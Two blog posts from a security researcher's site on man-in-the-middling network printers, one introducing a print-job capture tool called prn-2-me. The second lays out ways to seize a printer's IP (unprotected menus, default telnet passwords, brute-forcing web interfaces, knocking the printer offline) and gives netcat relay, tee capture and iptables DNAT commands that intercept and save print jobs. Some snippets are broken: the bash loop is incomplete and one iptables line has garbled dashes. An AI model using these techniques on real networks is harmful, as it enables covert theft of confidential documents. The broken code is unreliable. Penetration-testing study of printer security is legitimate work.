Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: man in the middle

Printer MITM revisited: prn-2-me

Well it’s been a while since I wrote about man in the middling printers (original post here), but I’ve not been totally ignoring the subject. After releasing the UA-Tester tool and writing a few small scripts for things like scr.im, I went back and had a look at the printer MITM topic with a mind to writing up a tool (in python obviously) to automate some of it. The result is a workable PoC tool called prn-2-me (mostly because it was late, and all creativity was long gone… sorry, no snazzy title this time!).

PRN-2-me is a simple listener that can be configured to run on any port (default is 9100 for jetdirect style connections). The tool will then save all incoming PCL and PostScript print jobs to file and forward them on to the real printer.

Now that you’ve got the print jobs saved to disk, it’s a simple task of sifting through them and seeing what nuggets of gold you’ve captured.

Postscript (PS): The simple format… you can open .ps files in most operating systems without any specialist software needed. Click and run… These files are also a LOT better quality than the PCL alternatives. If you don’t believe me just check out the samples.

Sample PS file –> HERE

PCL: Not so simple… PCL isn’t well supported when it comes to viewers. However all is not lost. There are 2 options here.

OpenPCL Viewer – Java based viewer (project can be found here)

GhostPCL  – By grabbing the source for GhostPDL you can compile PCL and/or XPS support to easily convert to other formats (project can be found here)

Example command line (example output):

pcl6 -sDEVICE=pdfwrite -sOutputFile=job_001_PCL.pdf job_001_PCL.pcl

Sample PCL file –> HERE

So, what’s next!

I’ve given up promising things on the blog, as I’ve already got a plate full of other projects waiting to start. Still, I hope to implement the same functionality into Metasploit at some point. There’s no reason why one of the capture modules couldn’t be re-written to capture printer traffic to file. If I can do it, it can’t be that complex after all 😉

The script is available for download HERE or in the tools section.

The tool is licensed under a mixture of BEERware (where you buy me beers if you like the tool) and FEEDBACKware (where you tell me how crap it is so I can make it better). Enjoy!


Man in the Middling Printers

This one has been rattling around in my head for a while, and since I’ve found myself with a few spare minutes, it’s time I wrote it up for your enjoyment and mine. This is certainly nothing new, but its one of those things that people seem to discount when performing penetration testing. After all, printers aren’t really cool anymore.

MITM attacks are often talked about together with credential stealing or traffic manipulation (inserting javascript into http streams). The new tool from Inguardians (the Middler) is a prime example of where the focus is right now. Although the middler was designed as a tool for performing attacks on all kinds of protocols, the examples provided with the alpha all focus on http(s) traffic. However what I want to talk about was using MITM attacks to steal confidential data in the form of print jobs.

When it comes to stealing data, most of the time you’re going to need a valid username/password to gain access. Sure you can exploit systems, use pass the hash or go the social engineering route, but you’re going to need access. However in this day and age of the failed paperless office, why go to those lengths when you can just steal the documents straight from the print queue. We all know how to perform ARP or DNS poisoning  to insert a system into the flow of traffic, but with printers this job can be made so much easier due to the overall lack of security on print devices.

There are four easy methods for stealing print jobs that spring to mind, other than using standard ARP or DNS spoofing attacks.

  1. Physical access – A majority of printers offer unprotected access to the menu. Through physical access you can change the printers IP address and assume the original for yourself.
  2. Telnet access – Not seen so often in modern printers, but can give you complete access if the passwords are blank or left at default. Again, reset the IP address and assume the original.
  3. Webserver access – Most modern printers offer a web interface for easy configuration. Brute-Force is an option here as they rarely enforce lockouts or use domain credentials. Again, reset the IP address and assume the original.
  4. Denial of Service – Crude but effective. This isn’t really a MITM attack, as you’d not be able to forward on the print job. Just drop the printer off the network (turn it off if you have to) and steal it’s IP.

Once you’ve gained access and stolen the IP address of the remote printer, there are a couple of ways to steal the print jobs. I started off by playing about with netcat using a simple netcat relay (and using tcpdump to copy the traffic).

mknod backpipe p
nc -l -p 9100 0<backpipe | nc <new printer ip> 9100 0>backpipe

The problem with this is that it would work on the first print job and then lockup. This is because the netcat relay would make the connection and leave it running. All subsequent print jobs would fail. Back to the drawing board.

My second attempt included the -w1 timeout for the second half of the netcat relay . This forces the connection to be dropped after 1 second of inactivity. This worked a little better but still not perfectly. I also threw in tee to prevent having to use tcpdump to capture the traffic (-a sets append).

mknod backpipe p
nc -l -p 9100 0<backpipe | tee -a capture.out | nc <new printer ip> -w1 9100 0>backpipe

The best results came from using the above command in a loop. I wrote a small bash script to do this. This is something to play with (your mileage may vary).


while true; do
echo “Print jobs captured = $i”
nc -l -p 9100 0<backpipe | tee -a capture-$i.out | nc $PRNIP -w1 9100 0>backpipe

As an alternative to netcat I also tested the use of iptables to perform a prerouting of the traffic.

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -F

iptables -t nat -F

iptables -X

iptables -t nat -A PREROUTING -p tcp — dport 9100 -j DNAT –to-destination <new printer ip>

The problem I can see here is that PREROUTING is performed before any of the traffic will be visible to TCPDUMP. So although we’re routing all the traffic to the printer, we can’t dump any of the print jobs. I’m no iptables expert by any stretch of the imagination. So maybe there is a way to do this easily without extra tools. I’ll have to try playing with the mangling rules and see if I can get some better results with iptables.